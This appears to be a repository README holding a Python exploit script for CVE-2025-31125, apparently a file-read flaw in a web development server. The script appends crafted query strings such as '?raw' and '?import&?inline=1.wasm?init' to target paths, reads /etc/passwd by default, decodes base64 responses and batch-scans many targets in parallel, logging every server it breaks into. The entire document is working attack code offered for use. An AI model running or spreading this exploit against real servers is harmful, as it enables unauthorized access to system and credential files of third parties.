README.md
Rendering markdown...
import base64
import requests
import argparse
import urllib3
import concurrent.futures
import re
import time
import threading
from urllib.parse import urljoin
from colorama import Fore, Style, init
# 初始化 colorama(使其在 Windows 中也能支持颜色)
init(autoreset=True)
# Suppress SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 最大重试次数
RETRY_LIMIT = 3
# 创建全局锁
print_lock = threading.Lock()
CVE_2025_31125_base_pattern = r'''
data:text/plain;base64, # 固定前缀
(["']?) # 可选引号(支持单/双引号或无引号)
(
(?:[A-Za-z0-9+/]{4})* # 标准分组(每4字符)
(?:[A-Za-z0-9+/]{3}= # 允许1个填充符
| [A-Za-z0-9+/]{2}==)? # 允许2个填充符
)
\1 # 闭合引号(若存在)
'''
def sanitize_filename(url):
""" 清理 URL 作为文件名,防止非法字符 """
safe_name = re.sub(r'[^\w\-]', '_', url) # 替换非法字符
safe_name = re.sub(r'_+', '_', safe_name) # 去重 `_`
safe_name = safe_name.strip('_') # 移除开头/结尾的 `_`
return safe_name
def fetch_url(url, proxy, retries=0):
""" 访问 URL,支持重试 """
proxies = {"http": proxy, "https": proxy} if proxy else None
try:
response = requests.get(url, timeout=5, verify=False, proxies=proxies, allow_redirects=False)
if response.status_code == 200:
return response.text
else:
with print_lock:
print(f"[FAIL] {url}")
return None
except requests.exceptions.RequestException:
if retries < RETRY_LIMIT:
wait_time = 2 ** retries # 指数退避
time.sleep(wait_time)
return fetch_url(url, proxy, retries + 1)
else:
with print_lock:
print(f"[ERROR] {url} Connection error")
return None
def check_path(base_url, path, proxy, output_file):
url1 = urljoin(base_url, path) + "?raw"
url2 = urljoin(base_url, path) + "?import&raw??"
url3 = urljoin(base_url, path) + "?import&?inline=1.wasm?init"
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as inner_executor:
future1 = inner_executor.submit(fetch_url, url1, proxy)
future2 = inner_executor.submit(fetch_url, url2, proxy)
future3 = inner_executor.submit(fetch_url, url3, proxy)
content1 = future1.result()
content2 = future2.result()
content3 = future3.result()
match = re.search(CVE_2025_31125_base_pattern, content3 ,re.VERBOSE)
if match:
base64_content = match.group(2)
content3 = base64.b64decode(base64_content)
content3 = content3.decode("utf-8")
# 写入成功 URL 到文件,并且同时打印到控制台
if content1 and "root:" in content1:
with print_lock:
print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url1}")
with open(output_file, "a", encoding="utf-8") as f:
f.write(f"[SUCCESS] {url1}\n")
return url1
elif content2 and "root:" in content2:
with print_lock:
print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url2}")
with open(output_file, "a", encoding="utf-8") as f:
f.write(f"[SUCCESS] {url2}\n")
return url2
elif content3 and "root:" in content3:
with print_lock:
print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url3}")
with open(output_file, "a", encoding="utf-8") as f:
f.write(f"[SUCCESS] {url3}\n")
return url3
else:
with print_lock:
print(f"[FAIL] {url1}")
print(f"[FAIL] {url2}")
print(f"[FAIL] {url3}")
return None
def check_url(base_url, paths, proxy, output_file):
results = []
with concurrent.futures.ThreadPoolExecutor() as executor:
future_to_path = {executor.submit(check_path, base_url, path, proxy, output_file): path for path in paths}
for future in concurrent.futures.as_completed(future_to_path):
res = future.result()
if res:
results.append(res)
return results
def check_urls_from_file(file_path, paths, proxy):
with open(file_path, 'r', encoding="utf-8") as file:
links = [line.strip() for line in file.readlines()]
with print_lock:
print(f"[INFO] Processing {len(links)} base URLs concurrently.")
output_file = "output.txt"
with open(output_file, "a", encoding="utf-8") as f:
results = []
with concurrent.futures.ThreadPoolExecutor() as executor:
future_to_link = {executor.submit(check_url, link, paths, proxy, output_file): link for link in links}
for future in concurrent.futures.as_completed(future_to_link):
res = future.result()
if res:
results.extend(res)
return results
def check_urls_from_dict(paths, proxy):
output_file = "output.txt"
with open(output_file, "a", encoding="utf-8") as f:
results = []
with concurrent.futures.ThreadPoolExecutor() as executor:
future_to_path = {executor.submit(fetch_url, path, proxy): path for path in paths}
for future in concurrent.futures.as_completed(future_to_path):
path = future_to_path[future]
content = future.result()
if content and "root:" in content:
with print_lock:
print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {path}")
f.write(f"[SUCCESS] {path}\n")
results.append(path)
else:
with print_lock:
print(f"[FAIL] {path}")
return results
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Batch check access to multiple paths on multiple links")
parser.add_argument("-f", "--file", help="File containing base links")
parser.add_argument("-u", "--url", help="Target URL")
parser.add_argument("-p", "--payload", default='/etc/passwd', help="Target file path")
parser.add_argument("-d", "--dict", help="File containing list of paths to append to base URL")
parser.add_argument("--proxy", help="Proxy server (e.g., http://proxy:port)")
args = parser.parse_args()
paths = []
if args.dict:
with open(args.dict, 'r') as dict_file:
paths = [line.strip() for line in dict_file.readlines()]
elif args.payload:
paths.append(args.payload)
if args.url:
check_url(args.url, paths, args.proxy, "output.txt")
elif args.file:
check_urls_from_file(args.file, paths, args.proxy)
elif args.dict:
check_urls_from_dict(paths, args.proxy)
else:
print("Usage: python3 script.py -h")